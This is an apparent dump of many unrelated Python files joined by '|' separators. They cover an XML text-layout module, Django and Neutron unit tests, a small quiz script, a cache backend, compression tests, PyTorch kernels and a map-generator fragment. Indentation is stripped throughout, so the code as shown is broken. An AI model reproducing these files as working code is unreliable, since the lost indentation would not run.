# with an ellipsis ('...') if the Block's number of lines exceeds
# that prescribed by the "max_lines" property.
"ellipsify"
]
# Style properties that are uninherited from a parent element to a
# chid element.
STYLE_UNINHERITED_PROPERTIES = [
# The following properties are identical to the CSS properties of
# the same name, with the exception that any underscores should be
# replaced by hyphens.
"margin_top",
"margin_bottom"
]
# All possibilities of styles defined by this module.
STYLE_PROPERTIES = (
STYLE_INHERITED_PROPERTIES +
STYLE_UNINHERITED_PROPERTIES
)
# ----------------------------------------------------------------------------
# Style Registry
# ----------------------------------------------------------------------------
class StyleRegistry(object):
"""
Registry of styles used by XML text layout markup. Note that this
class is not a singleton; rather, one StyleRegistry instance
exists for each document that the client wants to layout.
"""
def __init__(self):
"""
Creates an empty StyleRegistry object.
"""
self._styleDict = {}
def __validateKeys(self, style_dict):
"""
Makes sure that the keys of dict are the names of valid style
properties.
"""
invalidKeys = [key for key in style_dict.keys()
if key not in STYLE_PROPERTIES]
if len(invalidKeys) > 0:
raise InvalidPropertyError(str(invalidKeys))
def add(self, selector, **properties):
"""
Adds the given style selector with the given properties to the
style registry. If any of the properties are invalid, an
InvalidPropertyError is thrown.
Examples:
>>> styles = StyleRegistry()
>>> styles.add( 'document', width = '1000pt' )
>>> styles.add( 'p', foo = '1000pt' )
Traceback (most recent call last):
...
InvalidPropertyError: ['foo']
It should also be noted that the same style selector can't be
defined more than once, e.g.:
>>> styles.add( 'foo', width = '1000pt' )
>>> styles.add( 'foo', width = '1000pt' )
Traceback (most recent call last):
...
ValueError: Style 'foo' already exists.
"""
if selector in self._styleDict:
raise ValueError("Style '%s' already exists." % selector)
self.__validateKeys(properties)
self._styleDict[selector] = properties
def findMatch(self, selector):
"""
Given a selector, returns the style dictionary corresponding
to it. If no match is found, this method returns None.
Each key of the returned style dictionary corresponds to a
style property, while each value corresponds to the value of
the style property.
Examples:
>>> styles = StyleRegistry()
>>> styles.add( 'document', width = '1000pt' )
>>> styles.findMatch( 'document' )
{'width': '1000pt'}
>>> styles.findMatch( 'mystyle' ) == None
True
"""
return self._styleDict.get(selector, None)
def update(self, selector, **properties):
"""
Updates the styles for selector to those described by
properties.
Examples:
>>> styles = StyleRegistry()
>>> styles.add( 'document', width = '1000pt' )
>>> styles.update( 'document', margin_top = '24pt' )
>>> styles.findMatch( 'document' )
{'width': '1000pt', 'margin_top': '24pt'}
"""
assert selector in self._styleDict
self.__validateKeys(properties)
self._styleDict[selector].update(properties)
class InvalidPropertyError(Exception):
"""
Exception raised by the StyleRegistry when a style with invalid
properties is added to the registry.
"""
pass
# ----------------------------------------------------------------------------
# Cascading Style Stack
# ----------------------------------------------------------------------------
class CascadingStyleStack(object):
"""
Encapsulates the CSS-like 'cascading' style mechanism supported by
the XML text layout markup.
"""
# This is just a set version of STYLE_UNINHERITED_PROPERTIES.
uninheritedProps = set(STYLE_UNINHERITED_PROPERTIES)
def __init__(self):
"""
Creates an empty stack.
"""
self.__stack = []
def push(self, newStyle):
"""
Push a new style onto the Cascading Style Stack, making it the
current style.
"""
if len(self.__stack) > 0:
# "Cascade" the new style by combining it with our current
# style, removing any uninherited properties first.
currStyle = self.__stack[-1].copy()
props = self.uninheritedProps.intersection(currStyle.keys())
for key in props:
del currStyle[key]
currStyle.update(newStyle)
self.__stack.append(currStyle)
else:
# Set this style as our current style.
self.__stack.append(newStyle)
def pop(self):
"""
Remove the current style from the Cascading Style Stack.
"""
self.__stack.pop()
def _strToPoints(self, unitsStr):
"""
Converts from a string such as '1em', '2pt', '3in', '5pc', or
'20px' into a floating-point value measured in points.
"""
if unitsStr.endswith("em"):
currEmSizeStr = self.__stack[-1]["font_size"]
currEmSize = self._strToPoints(currEmSizeStr)
units = float(unitsStr[:-2])
return units * currEmSize
else:
return measurement.strToPoints(unitsStr)
def _propertyToPoints(self, propertyName):
"""
Converts the value of the given property name into a
floating-point value measured in points.
"""
propertyStr = self.__stack[-1][propertyName]
return self._strToPoints(propertyStr)
def _propertyToInt(self, propertyName):
"""
Converts the value of the given property name into an integer
value.
"""
return int(self.__stack[-1][propertyName])
def _propertyToBool(self, propertyName):
"""
Converts the value of the given property name into a boolean
value.
"""
return stringToBool(self.__stack[-1][propertyName])
def _propertyToColor(self, propertyName):
"""
Converts the value of the given property name into a (r, g, b,
a) color tuple.
"""
return colorHashToRgba(self.__stack[-1][propertyName])
def _property(self, propertyName):
"""
Returns the value of the given property name as a string.
"""
return self.__stack[-1][propertyName]
def makeNewDocument(self):
"""
Makes a new document with the current style.
"""
document = textlayout.Document(
width=self._propertyToPoints("width"),
marginTop=self._propertyToPoints("margin_top"),
marginBottom=self._propertyToPoints("margin_bottom"),
)
return document
def makeNewBlock(self):
"""
Makes a new block with the current style.
"""
block = textlayout.Block(
width=self._propertyToPoints("width"),
lineHeight=self._propertyToPoints("line_height"),
marginTop=self._propertyToPoints("margin_top"),
marginBottom=self._propertyToPoints("margin_bottom"),
textAlign=self._property("text_align"),
maxLines=self._propertyToInt("max_lines"),
ellipsify=self._propertyToBool("ellipsify")
)
return block
def makeNewGlyphs(self, characters):
"""
Makes new glyphs with the current style.
"""
glyphs = []
fontObj = font.Font.get(
self._property("font_family"),
self._propertyToPoints("font_size"),
self._property("font_style") == "italic"
)
color = self._propertyToColor("color")
for char in characters:
fontGlyph = fontObj.getGlyph(char)
glyph = textlayout.Glyph(
fontGlyph,
color,
)
glyphs.append(glyph)
return glyphs
# ----------------------------------------------------------------------------
# XML Markup Tag Aliases
# ----------------------------------------------------------------------------
class XmlMarkupTagAliases(object):
"""
Implementation of XML markup tag aliases, a simple feature that
allows one tag name to be aliased as another tag name.
"""
def __init__(self):
"""
Creates an empty set of tag aliases.
"""
self._aliases = {}
def add(self, name, baseElement):
"""
Adds a tag alias; 'name' will now be an alias for
'baseElement'.
The following example sets up tag aliases for <p> and
<caption> tags:
>>> tagAliases = XmlMarkupTagAliases()
>>> tagAliases.add( 'p', baseElement = 'block' )
>>> tagAliases.add( 'caption', baseElement = 'block' )
It should also be noted the same tag alias can't be defined
more than once, e.g.:
>>> tagAliases.add( 'foo', baseElement = 'inline' )
>>> tagAliases.add( 'foo', baseElement = 'block' )
Traceback (most recent call last):
...
ValueError: Tag alias 'foo' already exists.
"""
if name in self._aliases:
raise ValueError("Tag alias '%s' already exists." % name)
self._aliases[name] = baseElement
def get(self, name):
"""
Retrieves the tag that the given name is an alias for.
Example:
>>> tagAliases = XmlMarkupTagAliases()
>>> tagAliases.add( 'p', baseElement = 'block' )
>>> tagAliases.get( 'p' )
'block'
>>> tagAliases.get( 'caption' )
Traceback (most recent call last):
...
KeyError: 'caption'
"""
return self._aliases[name]
def has(self, name):
"""
Returns whether or not the given name is an alias for a tag.
Example:
>>> tagAliases = XmlMarkupTagAliases()
>>> tagAliases.add( 'p', baseElement = 'block' )
>>> tagAliases.has( 'p' )
True
>>> tagAliases.has( 'caption' )
False
"""
return name in self._aliases
# ----------------------------------------------------------------------------
# XML Markup Content Handler
# ----------------------------------------------------------------------------
class _XmlMarkupHandler(xml.sax.handler.ContentHandler):
"""
XML content handler for XML text layout markup.
"""
def __init__(self, styleRegistry, tagAliases=None):
"""
Initializes the content handler with the given style registry
and tag aliases.
"""
xml.sax.handler.ContentHandler.__init__(self)
self.styleRegistry = styleRegistry
if not tagAliases:
tagAliases = XmlMarkupTagAliases()
self.tagAliases = tagAliases
def startDocument(self):
"""
Called by the XML parser at the beginning of parsing the XML
document.
"""
self.style = CascadingStyleStack()
self.document = None
self.block = None
self.glyphs = None
def _pushStyle(self, name, attrs):
"""
Sets the current style to the style defined by the "style"
attribute of the given tag. If that style doesn't exist, we
use the style named by the tag.
"""
styleDict = None
styleAttr = attrs.get("style", None)
if styleAttr:
styleDict = self.styleRegistry.findMatch(styleAttr)
if styleDict is None:
styleDict = self.styleRegistry.findMatch(name)
if styleDict is None:
raise ValueError, "No style found for: %s, %s" % (
name,
str(styleAttr)
)
self.style.push(styleDict)
def startElement(self, name, attrs):
"""
Handles the beginning of an XML element.
"""
if name == "document":
self._pushStyle(name, attrs)
self.document = self.style.makeNewDocument()
elif name == "block":
if not self.document:
raise XmlMarkupUnexpectedElementError(
"Block element encountered outside of document element."
)
self._pushStyle(name, attrs)
self.block = self.style.makeNewBlock()
self.glyphs = []
elif name == "inline":
if not self.block:
raise XmlMarkupUnexpectedElementError(
"Inline element encountered outside of block element."
)
self._pushStyle(name, attrs)
elif self.tagAliases.has(name):
baseElement = self.tagAliases.get(name)
self.startElement(baseElement, {"style": name})
else:
raise XmlMarkupUnknownElementError(name)
def endElement(self, name):
"""
Handles the end of an XML element.
"""
if name == "document":
self.style.pop()
self.document.layout()
elif name == "block":
ellipsisGlyph = self.style.makeNewGlyphs(u"\u2026")[0]
self.block.setEllipsisGlyph(ellipsisGlyph)
self.style.pop()
self.block.addGlyphs(self.glyphs)
self.document.addBlock(self.block)
self.block = None
self.glyphs = None
elif name == "inline":
self.style.pop()
else:
baseElement = self.tagAliases.get(name)
self.endElement(baseElement)
def characters(self, content):
"""
Handles XML character data.
"""
if self.glyphs != None:
self.glyphs.extend(self.style.makeNewGlyphs(content))
else:
# Hopefully, the content is just whitespace...
content = content.strip()
if content:
raise XmlMarkupUnexpectedCharactersError(content)
class _LXmlMarkupHandler(object):
"""
XML content handler for XML text layout markup.
"""
def __init__(self, styleRegistry, tagAliases=None):
"""
Initializes the content handler with the given style registry
and tag aliases.
"""
self.styleRegistry = styleRegistry
if not tagAliases:
tagAliases = XmlMarkupTagAliases()
self.tagAliases = tagAliases
def _pushStyle(self, name, attrs):
"""
Sets the current style to the style defined by the "style"
attribute of the given tag. If that style doesn't exist, we
use the style named by the tag.
"""
styleDict = None
styleAttr = attrs.get("style", None)
if styleAttr:
styleDict = self.styleRegistry.findMatch(styleAttr)
if styleDict is None:
styleDict = self.styleRegistry.findMatch(name)
if styleDict is None:
raise ValueError, "No style found for: %s, %s" % (
name,
str(styleAttr)
)
self.style.push(styleDict)
def start(self, name, attrs):
"""
Handles the beginning of an XML element.
"""
if name == "document":
self.style = CascadingStyleStack()
self.document = None
self.block = None
self.glyphs = None
self._pushStyle(name, attrs)
self.document = self.style.makeNewDocument()
elif name == "block":
if not self.document:
raise XmlMarkupUnexpectedElementError(
"Block element encountered outside of document element."
)
self._pushStyle(name, attrs)
self.block = self.style.makeNewBlock()
self.glyphs = []
elif name == "inline":
if not self.block:
raise XmlMarkupUnexpectedElementError(
"Inline element encountered outside of block element."
)
self._pushStyle(name, attrs)
elif self.tagAliases.has(name):
baseElement = self.tagAliases.get(name)
self.start(baseElement, {"style": name})
else:
raise XmlMarkupUnknownElementError(name)
def end(self, name):
"""
Handles the end of an XML element.
"""
if name == "document":
self.style.pop()
self.document.layout()
elif name == "block":
ellipsisGlyph = self.style.makeNewGlyphs(u"\u2026")[0]
self.block.setEllipsisGlyph(ellipsisGlyph)
self.style.pop()
self.block.addGlyphs(self.glyphs)
self.document.addBlock(self.block)
self.block = None
self.glyphs = None
elif name == "inline":
self.style.pop()
else:
baseElement = self.tagAliases.get(name)
self.end(baseElement)
def data(self, content):
"""
Handles XML character data.
"""
if self.glyphs != None:
self.glyphs.extend(self.style.makeNewGlyphs(content))
else:
# Hopefully, the content is just whitespace...
content = content.strip()
if content:
raise XmlMarkupUnexpectedCharactersError(content)
def close(self):
# TOTO: Reset here to clean slate?
pass
class XmlMarkupUnknownElementError(Exception):
"""
Exception raised when an unknown XML text layout markup element is
encountered.
"""
pass
class XmlMarkupUnexpectedElementError(Exception):
"""
Exception raised when a recognized, but unexpected XML text layout
markup element is encountered.
"""
pass
class XmlMarkupUnexpectedCharactersError(Exception):
"""
Exception raised when characters are encountered in XML text
layout in a place where they're not expected.
"""
pass
# ----------------------------------------------------------------------------
# XML Markup to Document Conversion
# ----------------------------------------------------------------------------
def _sax_xmlMarkupToDocument(text, styleRegistry, tagAliases=None):
"""
Converts the given XML text into a textlayout.Document object that
has been fully laid out and is ready for rendering, using the
given style registry and tag aliases.
"""
# Convert all occurrences of multiple contiguous whitespace
# characters to a single space character.
text = RE_REDUCESPACE.sub(" ", text)
# Convert all occurrences of the non-breaking space character
# entity reference into its unicode equivalent (the SAX XML parser
# doesn't recognize this one on its own, sadly).
text = text.replace(" ", NON_BREAKING_SPACE)
text = text.encode("ascii", "xmlcharrefreplace")
xmlMarkupHandler = _XmlMarkupHandler(styleRegistry, tagAliases)
try:
xml.sax.parseString(text, xmlMarkupHandler)
except SAXParseException as e:
logging.error("Error parsing XML: '%s'; %s", text, e)
raise
return xmlMarkupHandler.document
def _lxml_xmlMarkupToDocument(text, styleRegistry, tagAliases=None):
"""
Converts the given XML text into a textlayout.Document object that
has been fully laid out and is ready for rendering, using the
given style registry and tag aliases.
"""
# Convert all occurrences of multiple contiguous whitespace
# characters to a single space character.
text = RE_REDUCESPACE.sub(" ", text)
# Convert all occurrences of the non-breaking space character
# entity reference into its unicode equivalent (the SAX XML parser
# doesn't recognize this one on its own, sadly).
text = text.replace(" ", NON_BREAKING_SPACE)
text = text.encode("ascii", "xmlcharrefreplace")
# TODO: Cache this?
handler = _LXmlMarkupHandler(styleRegistry, tagAliases)
parser = etree.XMLParser(
strip_cdata=False, resolve_entities=False, remove_blank_text=False,
huge_tree=False, target=handler
)
etree.fromstring(text, parser)
return handler.document
# lxml parser is preferred for its speed
xmlMarkupToDocument = _lxml_xmlMarkupToDocument if LXML_AVAILABLE \
else _sax_xmlMarkupToDocument
|
# Copyright 2014, Doug Wiegley (dougwig), A10 Networks
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nose.plugins.attrib import attr
from a10_neutron_lbaas.tests.unit import test_base
from a10_neutron_lbaas.plumbing import portbinding_vlan
from neutron.db.models.segment import NetworkSegment
from neutron.db.models_v2 import Port
from neutron.plugins.ml2.models import PortBindingLevel
_SUBNET_ID = "mysubnet"
_PORT_ID = "portid"
_SEGMENT_ID = "mysegment"
_VLAN_ID = 2000
_NETWORK_ID = "mynetwork"
_LEVEL = 1
def raise_(exc):
raise exc
class FakeModel(object):
def __init__(self, **kwargs):
self._dict = kwargs
def __getattr__(self, key):
return self._dict.get(key) or raise_(KeyError(key))
class FakeSession(object):
_model_map = {
PortBindingLevel: FakeModel(segment_id=_SEGMENT_ID, level=_LEVEL),
NetworkSegment: FakeModel(id=_SEGMENT_ID, segmentation_id=_VLAN_ID),
Port: FakeModel(id=_PORT_ID, subnet_id=_SUBNET_ID, network_id=_NETWORK_ID),
}
def __init__(self, *args, **kwargs):
pass
def query(self, model):
self._rval = self._model_map[model]
return self
def filter_by(self, *args, **kwargs):
return self
def first(self):
return self._rval
class FakeConfig(object):
def __init__(self, *args, **kwargs):
self._dict = kwargs
def get(self, key):
return self._dict.get(key)
@attr(db=True)
class TestVlanPortBindingPlumbing(test_base.UnitTestBase):
version = "v2"
def setUp(self, *args, **kwargs):
super(TestVlanPortBindingPlumbing, self).setUp(*args, **kwargs)
self._subnet_id = "mysubnet"
self._port_id = "portid"
self._segment_id = "mysegment"
self._vlan_id = 2000
self._network_id = "mynetwork"
self._level = 1
self._binding_level = mock.Mock(level=1, segment_id=self._segment_id)
self._segment = mock.Mock(id=self._segment_id, segmentation_id=self._vlan_id)
self._build_mocks()
self.target = portbinding_vlan.VlanPortBindingPlumbingHooks(self._driver, self._devices)
def test_select_device(self):
a = self.target.select_device("first-token")
self.target.select_device("second-token")
self.assertEqual(a, self.target.select_device("first-token"))
def test_after_vip_create(self):
self.target.after_vip_create(self.a10_context, self.os_context, self._vip)
self._client.vlan.create.assert_called_once_with(_VLAN_ID, mock.ANY, mock.ANY)
def test_after_vip_create_ve_exists(self):
self._client.interface.ve.get.return_value = {"ve": 2}
self.target.after_vip_create(self.a10_context, self.os_context, self._vip)
self._client.vlan.create.assert_not_called()
def _build_mocks(self):
# a10_context dependencies
self._vip = FakeModel(vip_subnet_id="mysubnet",
vip_port=FakeModel(id=self._port_id, network_id=self._network_id))
self._devices = {"a": {"host": "1.2.3.4", "api_version": "3.0"}}
self._driver = mock.Mock()
self._client = self._build_client()
self._config = FakeConfig(
use_database=False,
vlan_interfaces={
"tagged_trunks": [1, 2],
},
use_dhcp=False,
vlan_binding_level=self._level
)
self._a10_driver = mock.Mock(config=self._config)
self.a10_context = mock.Mock(a10_driver=self._a10_driver, client=self._client)
self._session = self._build_session()
self.os_context = mock.Mock(session=self._session, tenant_id="tenant")
def _build_session(self, **kwargs):
return FakeSession()
def _build_client(self):
rval = mock.Mock()
rval.interface.ve.get_oper.return_value = None
rval.interface.ve.get = lambda: {}
return rval
|
from django.contrib.auth.models import User
from django.test import TestCase
from django.urls import resolve, reverse
from ..models import Board, Post, Topic
from ..views import PostListView
class TopicPostsTests(TestCase):
def setUp(self):
self.board = Board.objects.create(name='Django', description='Django board.')
self.user = User.objects.create_user(username='john', email='[email protected]', password='123')
self.topic = Topic.objects.create(subject='Hello, world', board=self.board, starter=self.user)
Post.objects.create(message='Lorem ipsum dolor sit amet', topic=self.topic, created_by=self.user)
self.url = reverse('topic_posts', kwargs={'pk': self.board.pk, 'topic_pk': self.topic.pk})
self.response = self.client.get(self.url)
def test_status_code(self):
self.assertEquals(self.response.status_code, 200)
def test_view_function(self):
view = resolve('/boards/1/topics/1/')
self.assertEquals(view.func.view_class, PostListView)
|
# Django imports
from django.urls import path
# About app imports
from about.views.about_view import about
app_name = 'about'
urlpatterns = [
path(
route='',
view=about,
name='about'
),
]
|
perguntas = {
'Pergunta1':{
'pergunta':'Quanto é 2 + 2?',
'respostas': {'a':2,'b':22,'c':4},
'resposta_certa':'c'
},
'Pergunta2':{
'pergunta':'Quanto é 2 - 2?',
'respostas': {'a':2,'b':0,'c':4},
'resposta_certa':'b'
}
}
acertos = 0
for pk,pv in perguntas.items():
print(f'{pk} {pv["pergunta"]}')
for rk,rv in pv["respostas"].items():
print(f'{rk} {rv}')
print()
resp_user = input('Digite a sua resposta')
if resp_user == pv["resposta_certa"]:
print("Voce acertou!!!")
acertos += 1
else:
print("Voce errou!!")
qtd_perguntas = len(perguntas)
porcento = (acertos/qtd_perguntas)*100
print(f'Voce acertou {acertos} perguntas e teve um percentual de {porcento} perguntas acertadas')
|
# coding=utf-8
from __future__ import absolute_import, division, print_function, \
unicode_literals
from typing import Optional, Text, Tuple, Union
from django.core.cache import BaseCache, DEFAULT_CACHE_ALIAS
from django.core.cache.backends.base import DEFAULT_TIMEOUT
from triggers.locking import resolve_cache
from triggers.storages.base import BaseTriggerStorage
__all__ = [
'CacheStorageBackend',
]
class CacheStorageBackend(BaseTriggerStorage):
"""
Uses the Django cache as a storage backend for TriggerManager.
"""
def __init__(self, uid, cache=DEFAULT_CACHE_ALIAS, timeout=DEFAULT_TIMEOUT):
# type: (Text, Union[BaseCache, Text], Optional[int]) -> None
"""
:param uid:
Session UID
:param cache:
The cache backend (or name thereof) to use.
:param timeout:
Timeout value to use when storing data to the cache.
Depending on which cache you are using (e.g., Redis),
setting ``timeout=None`` may store values permanently, or
it may use the cache's default timeout value.
"""
super(CacheStorageBackend, self).__init__(uid)
self.cache = resolve_cache(cache)
self.timeout = timeout
def close(self, **kwargs):
try:
self.cache.close(**kwargs)
except AttributeError:
pass
def _load_from_backend(self):
# type: () -> Tuple[dict, dict, dict]
cached = self.cache.get(self.cache_key) or {}
return (
cached.get('tasks') or {},
cached.get('instances') or {},
cached.get('metas') or {},
)
def _save(self):
self.cache.set(
self.cache_key,
{
'tasks': self._serialize(self._configs, True),
'instances': self._serialize(self._instances, True),
'metas': self._metas,
},
self.timeout,
)
@property
def cache_key(self):
# type: () -> Text
"""
Returns the key used to look up state info from the cache.
"""
return __name__ + ':' + self.uid
|
"""
(c) 2021 Usman Ahmad https://github.com/selphaware
test_main.py
Testing mainly file compressions and some string compressions
"""
import unittest
from tests.tfuncs import string_test, compress_test # type: ignore
from os import remove
class TestHuffPress(unittest.TestCase):
def test_d_txt(self):
self.assertEqual(compress_test("../tests/files/d.txt"), True)
remove("../tests/files/d.txt.bak")
remove("../tests/files/d.txt.hac")
def test_i_txt(self):
self.assertEqual(compress_test("../tests/files/i.txt"), True)
remove("../tests/files/i.txt.bak")
remove("../tests/files/i.txt.hac")
def test_j_txt(self):
self.assertEqual(compress_test("../tests/files/j.txt"), True)
remove("../tests/files/j.txt.bak")
remove("../tests/files/j.txt.hac")
def test_u_exe(self):
self.assertEqual(compress_test("../tests/files/u.exe"), True)
remove("../tests/files/u.exe.bak")
remove("../tests/files/u.exe.hac")
def test_string1(self):
in_txt = "A_DEAD_DAD_CEDED_A_BAD_BABE_A_BEADED_ABACA_BED"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string2(self):
in_txt = "AABBCC"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string3(self):
in_txt = "AAA"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string4(self):
in_txt = "A"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string5(self):
in_txt = "!\"£$%^&*()_+{}:@~<>?,./;'#[]789654321/*-+\\`¬|"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string6(self):
in_txt = "AB"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string7(self):
in_txt = " A B C D E F G P "
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string8(self):
in_txt = "A "
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
|
from forsa import settings
from wajiha.models import OpportunityCategory
def google_keys(request):
return {'GOOGLE_ANALYTICS_KEY': settings.GOOGLE_ANALYTICS_KEY, 'GTM_KEY': settings.GTM_KEY}
def category_list(request):
return {'category_search_list': OpportunityCategory.objects.all()} |
# -*- coding: utf-8 -*
from itertools import chain
from os import getcwd, path
import argparse
from pupy.decorations import tictoc
CD = getcwd()
def fmt_line(line, col, phillup=False):
"""
:param line:
:param col:
:return:
# >>> format_line([])
"""
if len(line) == 1:
code = line[0]
if phillup: return ''.join((code, ' ' * (1 + col - len(code)), '#$#'))
else: return code
if len(line) == 2:
code, comment = line
return ''.join((code, ' ' * (1 + col - len(code)), '#$#', comment))
@tictoc()
def funk_docktor(unfunky, clusters=True, phillup=False):
"""Formats a multi-line string"""
if clusters:
pass
else:
lines = unfunky.replace('# $#', '#$#').split('\n')
furst = min(i for i, line in enumerate(lines)
if '#$#' in line)
last = max(i for i, line in enumerate(lines)
if '#$#' in line)
doc_lines = [line.split("#$#")
for line in lines[furst:last + 1]]
maxcodelength = max(len(line[0]) for line in doc_lines
if len(line) == 2)
lgne = [fmt_line(line,
col=maxcodelength,
phillup=phillup)
for line in doc_lines]
if phillup and doc_lines[-1][0] == '':
lgne[-1] = ''
return '\n'.join(chain.from_iterable((lines[:furst], lgne, lines[last + 1:])))
def main():
parser = argparse.ArgumentParser(description='~ ~ ~ Funk ~ DOCKTOR ~ ~ ~ ')
parser.add_argument('-p', '--phillup',
action="store_true",
dest='phillup',
default=False)
parser.add_argument('-i', '--inplace',
action="store_true",
dest='inplace',
default=False)
parser.add_argument('-f', '--file',
type=argparse.FileType('r'),
nargs='+')
args = parser.parse_args()
for file in args.file:
abs_fpath = path.join(CD, file.name)
fdir, fname = path.split(abs_fpath)
fname = fname.replace('.py', '.[FDOC].py')
with open(path.join(fdir, fname), 'w') as docktored:
docktored.write(funk_docktor(file.read(), clusters=False))
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Factory class for PySparkBatch message."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.command_lib.dataproc import flags
from googlecloudsdk.command_lib.dataproc import local_file_uploader
class PySparkBatchFactory(object):
"""Factory class for PySparkBatch message."""
def __init__(self, dataproc):
"""Factory class for SparkBatch message.
Args:
dataproc: A Dataproc instance.
"""
self.dataproc = dataproc
def UploadLocalFilesAndGetMessage(self, args):
"""upload user local files and creates a PySparkBatch message.
Upload user local files and point URIs to the local files to the uploaded
URIs.
Creates a PySparkBatch message from parsed arguments.
Args:
args: Parsed arguments.
Returns:
PySparkBatch: A PySparkBatch message.
Raises:
AttributeError: Bucket is required to upload local files, but not
specified.
"""
kwargs = {}
if args.args:
kwargs['args'] = args.args
dependencies = {}
# Upload requires a list.
dependencies['mainPythonFileUri'] = [args.MAIN_PYTHON_FILE]
if args.python_files:
dependencies['pythonFileUris'] = args.python_files
if args.py_files:
dependencies['pythonFileUris'] = args.py_files
if args.jar_files:
dependencies['jarFileUris'] = args.jar_files
if args.jars:
dependencies['jarFileUris'] = args.jars
if args.files:
dependencies['fileUris'] = args.files
if args.archives:
dependencies['archiveUris'] = args.archives
if local_file_uploader.HasLocalFiles(dependencies):
bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket
if not bucket:
raise AttributeError('--deps-bucket was not specified.')
dependencies = local_file_uploader.Upload(bucket, dependencies)
# Move mainPythonFileUri out of the list.
dependencies['mainPythonFileUri'] = dependencies['mainPythonFileUri'][0]
# Merge the dict first for compatibility.
# Old python versions don't support multi unpacking of dictionaries.
kwargs.update(dependencies)
return self.dataproc.messages.PySparkBatch(**kwargs)
def AddArguments(parser):
"""Adds arguments related to PySparkBatch message."""
flags.AddMainPythonFile(parser)
flags.AddPythonFiles(parser)
flags.AddJarFiles(parser)
flags.AddOtherFiles(parser)
flags.AddArchives(parser)
flags.AddArgs(parser)
# Cloud Storage bucket to upload workload dependencies.
# It is required until we figure out a place to upload user files.
flags.AddBucket(parser)
|
from slither.core.visualization import render_map
from slither.service import Service
s = Service()
activities = s.list_activities()
a = [a for a in activities if a.has_path][0]
print(a.start_time)
map = render_map(a.get_path())
with open("map.html", "w") as f:
f.write(map)
|
from django.db import models
# Create your models here.
from django.contrib.auth.models import AbstractUser
from django.db import models
from django.contrib.auth.base_user import BaseUserManager
class CustomUserManager(BaseUserManager):
def create_user(self, email, password, **extra_fields):
if not email:
raise ValueError('The Email must be set')
email = self.normalize_email(email)
user = self.model(email=email, **extra_fields)
user.set_password(password)
user.save()
return user
def create_superuser(self, email, password, **extra_fields):
extra_fields.setdefault('is_staff', True)
extra_fields.setdefault('is_superuser', True)
extra_fields.setdefault('is_active', True)
if extra_fields.get('is_staff') is not True:
raise ValueError('Superuser must have is_staff=True.')
if extra_fields.get('is_superuser') is not True:
raise ValueError('Superuser must have is_superuser=True.')
return self.create_user(email, password, **extra_fields)
class CustomUser(AbstractUser):
username = None
email = models.EmailField('email address', unique=True)
is_professor = models.BooleanField('this user is a professor?', default=False)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
objects = CustomUserManager()
def __str__(self):
return self.email |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : kernel.py
# Author : Jiayuan Mao
# Email : [email protected]
# Date : 02/04/2018
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
"""Useful utilities for kernel-based attention mechanism."""
import torch
from .linalg import normalize
__all__ = ['inverse_distance', 'cosine_distance', 'dot']
def inverse_distance(f_lookup, f, p=2, eps=1e-8):
"""
Inverse distance kernel.
Args:
f_lookup (FloatTensor): features of the lookup keys
f (FloatTensor): features of the value keys
Returns:
FloatTensor: the attention mask for each lookup keys.
"""
n, m, k = f_lookup.size(0), f.size(0), f.size(1)
f_lookup = f_lookup.view(n, 1, k).expand(n, m, k)
f = f.view(1, m, k).expand(n, m, k)
# TODO(Jiayuan Mao @ 05/26): this function can be optimized.
dist = (f_lookup - f).norm(p, dim=2)
return 1. / dist.clamp(min=eps)
def cosine_distance(f_lookup, f):
"""
Cosine distance kernel.
Args:
f_lookup (FloatTensor): features of the lookup keys
f (FloatTensor): features of the value keys
Returns:
FloatTensor: the attention mask for each lookup keys.
"""
f_lookup = normalize(f_lookup, 2, dim=1)
f = normalize(f, 2, dim=1)
return torch.mm(f_lookup, f.t())
def dot(f_lookup, f):
"""
Dot product kernel, essentially a cosine distance kernel without normalization.
Args:
f_lookup (FloatTensor): features of the lookup keys
f (FloatTensor): features of the value keys
Returns:
FloatTensor: the attention mask for each lookup keys.
"""
return torch.mm(f_lookup, f.t())
|
# ==========================================================
# INFORMATIONS :
# -----------------------------
# UTILITÉ :
# Corps du programme de génération
# procédurale de carte en 2D
# ==========================================================
import time
import sys
from modules.short_class_import import BoardBox, Seed
from modules.decisional import generate_box
from modules.encyclopedia_functions import encyclopedia_creation
from modules.image_creation import write_image_header, write_image_body
from modules.trees_generation import generate_trees
from modules.utilities import is_integer, print_progress
###############################################################
################## CHOIX DE L'UTILISATEUR #####################
###############################################################
print("Hello, welcome to pyprocgen, a 2D procedural map generator. \n")
# ... de la taille de la map :
print("- Enter the map's dimensions :")
print(" Tip : enter integers between 100 and 5000")
# Pour la largeur :
width = None
while not is_integer(width):
if width is not None:
print(" Enter an integer.")
width = input(" Width : ")
width = int(width)
# Pour la hauteur :
height = None
